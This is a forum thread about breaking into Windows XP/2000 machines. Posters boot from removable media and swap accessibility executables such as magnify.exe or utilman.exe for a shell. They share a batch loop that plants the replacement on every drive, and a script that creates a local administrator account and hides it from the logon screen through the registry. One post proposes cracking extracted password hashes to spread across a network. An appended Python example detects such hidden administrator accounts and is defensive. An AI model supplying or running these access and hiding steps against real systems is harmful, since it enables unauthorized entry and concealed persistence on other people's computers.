
Gain SYSTEM/Administrative Access to Windows XP/2000


celltoolz

Ehm, if you try this you'll get some nice errors ;)

I'm booting from a DOS floppy, so I don't have system variables

If it would be so easy, I would have done this.

A problem I spotted is, if someone has more than just 1 Windows NT system installed, that the script just copies it once.

Hmm I guess I should learn to read properly... :-(

Link to comment

  • 4 weeks later...

no problem :)

I tried my "1337-get-admin-rights-prog" on several computers and I realized a problem:

it doesn't work properly if there is more than one installed Windows NT system on the computer, because my program checks out every drive by doing an "if exist" query, so the last drive is the used one.

Does anyone know an automated workaround?

Link to comment


@echo on
FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
    IF EXIST %i:\ntldr (
        SET SYS=%i
        FOR %a IN (windows winnt) DO (
            IF EXIST %sys%:\%a\system32\winlogon.exe (
                SET WIN=%a
                copy ".\magnify.exe" "%SYS%:\%win%\system32\dllcache\magnify.exe" /Y
                copy ".\magnify.exe" "%SYS%:\%win%\system32\magnify.exe" /Y
            )
        )
    )
)

Could try that. You could also rewrite it to make it look better, but that should work to copy it over to every existence of Windows on every drive.

Link to comment

It's not really straightforward and only for larger networks (and slightly off topic), but if you can create an admin account (boot cd, floppy, whatever) on one random machine and extract the hashes and crack them, maybe the system administrator has used the same password for some other machines and then you can make a kind of chain reaction:

One cracked machine causes another cracked machine.

And by that, maybe you can gain a large pool of master passwords.

I think the use of that pool is clear.

Link to comment

Hello!

How do I use this tool to make a new user?

Do I use command prompt?

If so, what do I type?

And... what is the latest utilman.exe... link plz

thx

rainbowCOLOR

Anyone else find this style of writing similar to a member that recently got banned ?

Link to comment

  • 3 weeks later...
  • 1 month later...

yeah, I've done a similar hack to this... I noticed that it was already mentioned on the first page, but to replace the screensaver file with cmd.exe and just making the account yourself, there's pros and cons with this in comparison to your 'utilman' method, let's see the obvious con of it is definitely the 15-minute wait for the screensaver to come on, however... if you're not much of a programmer and don't have Visual Basic, the cmd.exe replaceable looks much more attractive =p

Link to comment

  • 1 month later...

After putting Debian on my pc I sadly didn't have much time for hak.5 and batch projects :(

I put FreeDOS on my thumb drive in combination with the utilman or "magnify.exe" and tested it with different computers. I like how easy it works. I post the code once again since I modified it a little bit.

net user Accountname Accountpassword /add 2>nul
net localgroup Administratoren Accountname /add 2>nul || net localgroup administrators Accountname /add 2>nul
net localgroup Benutzer Accountname /delete 2>nul || net localgroup users Accountname /delete 2>nul
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Accountname /t REG_DWORD /d 0 2>nul

This code can be compiled via any batch compiler or again modified to be compiled by the Nullsoft Scriptable Install System (very dirty I guess).

Link to comment
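A defender's check for the kind of account the commands in the last post create and hide, written as an added example that is not part of the thread: it parses the output of `reg query` on the SpecialAccounts\UserList key and of `net localgroup`, and reports accounts that are both hidden from the logon screen and local administrators. The sample outputs and the account names in them are constructed.

```python
import re

# Constructed sample: `reg query` output for the SpecialAccounts\UserList key.
REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    HelpAssistant    REG_DWORD    0x0
    svc_update    REG_DWORD    0x0
    kiosk    REG_DWORD    0x1
"""

# Constructed sample: `net localgroup administrators` output (English locale).
NET_LOCALGROUP = """\
Alias name     administrators
Comment        Administrators have complete and unrestricted access

Members

-------------------------------------------------------------------------------
Administrator
svc_update
The command completed successfully.
"""

def hidden_accounts(reg_output):
    """Names whose UserList value is REG_DWORD 0 (not shown on the Welcome screen)."""
    hidden = set()
    for line in reg_output.splitlines():
        m = re.match(r"\s+(.+?)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$", line)
        if m and int(m.group(2), 16) == 0:
            hidden.add(m.group(1).lower())
    return hidden

def group_members(net_output):
    """Members listed after the dashed rule. Assumption: the last non-empty line
    is the status message, whatever the display language."""
    lines = [l.strip() for l in net_output.splitlines()]
    rule = next((i for i, l in enumerate(lines) if l.startswith("-----")), None)
    if rule is None:
        return set()
    body = [l for l in lines[rule + 1:] if l]
    return {name.lower() for name in body[:-1]}

def hidden_admins(reg_output, net_output):
    """Accounts that are hidden from the logon screen and also local administrators."""
    return sorted(hidden_accounts(reg_output) & group_members(net_output))

if __name__ == "__main__":
    for name in hidden_admins(REG_QUERY, NET_LOCALGROUP):
        print("review hidden administrator account:", name)
```

Because the member list is read by position rather than by matching the English status text, the same function handles output from a localized group such as Administratoren.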
